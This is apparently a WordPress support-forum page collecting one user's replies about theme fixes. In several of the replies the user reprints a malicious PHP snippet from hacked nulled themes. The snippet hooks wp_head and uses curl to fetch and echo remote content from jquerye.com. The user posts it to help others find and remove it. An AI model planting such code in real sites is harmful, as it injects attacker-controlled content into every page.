PDIMG
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Resizing featured images?I know about this plugin, but I thought that there is something wrong with my code.
Regenerated, and everything is working as supposed now.
Thank you.
I’m running Rest API and Auth token…
Forum: Plugins
In reply to: [Contact Form 7] Styling 'Please fill the required field.' messages?Thank you for your answer bxwebber!
Your tip about checking CF7 styles.css helped me to find the correct class. It should be:
span.wpcf7-not-valid-tipIssue solved, thank you!
Forum: Fixing WordPress
In reply to: Updating the website footerWell, it is probably a paid theme – so don’t pull the link from anywhere.
Try the Notepad++ method I’ve mentioned above.
Forum: Fixing WordPress
In reply to: Updating the website footerCan you share the download link for the theme you are using on your website so I can check? Maybe the number is in functions.php(or some other file) and then only function called from footer.php…
If you are familiar with PHP, you can also use Notepad++ and search for 2012 through all your theme files. Of course, there might be multiple results, so be careful.
Forum: Fixing WordPress
In reply to: www.jquerye.com/jquery-1.6.3.min.js (port 80) errori had same problem on occhiali moda 2013, it’s just because jquery group didn’t renew jquerye.com domain and some theme refer to jquerye.com/… for jquery 1.6.3 minified.
You’re wrong.
#1 The “jquery slider” wouldn’t work after you remove this function – if there were a need for this file.
#2 Find original jquery-1.6.3.min.js add it to your website, and replace the link in this files with your(original) one. You will(at least I did) get a ten times worse header output with a bunch of problems.
#3
add_action('wp_head', 'insert_jquery_slider')Why would anyone add a jquery slider in the <head> section of the website ? 😉
Forum: Fixing WordPress
In reply to: www.jquerye.com/jquery-1.6.3.min.js (port 80) error-I’m glad that my method have helped to some of you, but:
Please be sure to check links that @esmi posted on how to secure your wordpress website etc.
-I know that most of us got this problem because we used nulled themes/plugins, but same goes for both nulled and legal add-ons owners:
No one cannot guarantee that this was the only malicious code. In fact, this code exposed itself only because “jquerye.com” went down. “jquerye.com” could still be alive, and no one would notice it – because your website was working “fine” and “only” invisible spammy backlinks generated by this hack were a problem.
Edit:I really hope that each one of you knew this already, but no harm from pointing it out over and over again:
After this kind of situation, immediate change of all usernames and passwords(FTP/Hosting/cPanel/Wordpress/Database) is something you don’t want to skip.
Forum: Fixing WordPress
In reply to: How to link image in excerpt to image itself instead to post?I’ve tried figuring out the theme code as well, but found nothing.
You opened my eyes!
Now I see that client was actually messing something with posts. I’ve cleared that up, and as you said – whatever link is given to images, that’s exactly the link in the excerpt as well.
Thanks again, problem solved.
Forum: Fixing WordPress
In reply to: How to link image in excerpt to image itself instead to post?Hello, and thank you for trying to help!
here is the theme download link:
Forum: Fixing WordPress
In reply to: www.jquerye.com/jquery-1.6.3.min.js (port 80) error@dicebat – It’s always great to read something like that 🙂
It was my pleasure to help – that’s what this forum is all about.
Forum: Fixing WordPress
In reply to: www.jquerye.com/jquery-1.6.3.min.js (port 80) errorUse the methods above to search through your plugin and themes file. It can be any.
Forum: Fixing WordPress
In reply to: www.jquerye.com/jquery-1.6.3.min.js (port 80) errorIf you have a legitimate theme, then be sure to check plugins also.
Forum: Fixing WordPress
In reply to: www.jquerye.com/jquery-1.6.3.min.js (port 80) errorPlease take a look at my post from here:
http://ww.wp.xz.cn/support/topic/the-requested-url-jquery-163minjs?replies=6
Forum: Fixing WordPress
In reply to: The requested URL /jquery-1.6.3.min.jsHello! I’ve just fixed this problem on one of my websites, so I might be able to help.
Seems that someone massively distributed hacked themes, and today his website went down – that’s why you have this error now. Your website is trying to find jquery file on his website, but can’t find it.
<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>This is how mine malicious code looked.
Download your theme folder, run a search for “jquery-1.6.3.min.js” through all files(by using Notepad++ on Windows or Search for Files on Linux) and locate code similar to one from above.
If you find this code in some important file(functions.php for example) delete this part:
{if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}save the file, re-upload it and see if it helps.
If you find this code in some weird file(mine was class.php) and all it contains is check for one function and malicious code, delete this file, and create the one with same name, but empty the code(only <?php ?>).
Edit: If you have a legitimate theme, then be sure to check plugins also.
Regards,
StefanForum: Fixing WordPress
In reply to: The document has moved here on top of every page ?drarkan – Thank you for sharing your solution 🙂 I’ve removed the few lines from my theme’s header.php(same lines as yours) and the link at the top of the page is now gone.
The bad thing is that we are surely hacked, but at least we know that 🙂
As for the your .htaccess code, it looks fine. When you started your website, you probably didn’t set the pretty permalinks, thats why your .htaccess was empty.